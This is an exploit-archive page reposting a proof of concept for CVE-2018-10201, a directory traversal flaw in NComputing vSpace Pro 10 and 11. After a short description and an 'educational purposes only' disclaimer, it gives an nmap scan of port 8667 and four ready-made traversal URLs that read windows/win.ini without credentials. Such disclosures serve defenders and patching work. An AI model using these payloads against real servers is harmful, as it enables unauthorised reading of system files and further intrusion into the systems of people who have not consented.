Ncomputing vspace pro 10/11 directory traversal Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-04-23 | Type : webapps | Platform : windows
This exploit / vulnerability Ncomputing vspace pro 10/11 directory traversal is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability
# Date: 2018-04-20
# Software Vendor: NComputing
# Software Link:
# Author: Javier Bernardo
# Contact: javier@kwell.net
# Website: http://www.kwell.net
# CVE: CVE-2018-10201
# Category: Webapps

#[Description]
#
#It is possible to read arbitrary files outside the root directory of
#the web server. This vulnerability could be exploited remotely by a
#crafted URL without credentials, with …/ or …\ or …./ or ….\ as a
#directory-traversal pattern to TCP port 8667.
#
#An attacker can make use of this vulnerability to step out of the root
#directory and access other parts of the file system. This might give
#the attacker the ability to view restricted files, which could provide
#the attacker with more information required to further compromise the system.

#[PoC]

nmap -p T:8667 -Pn your_vSpace_server

Nmap scan report for your_vSpace_server (x.x.x.x)
Host is up (0.044s latency).

PORT STATE SERVICE
8667/tcp open unknown

http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini

http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini

http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini

http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini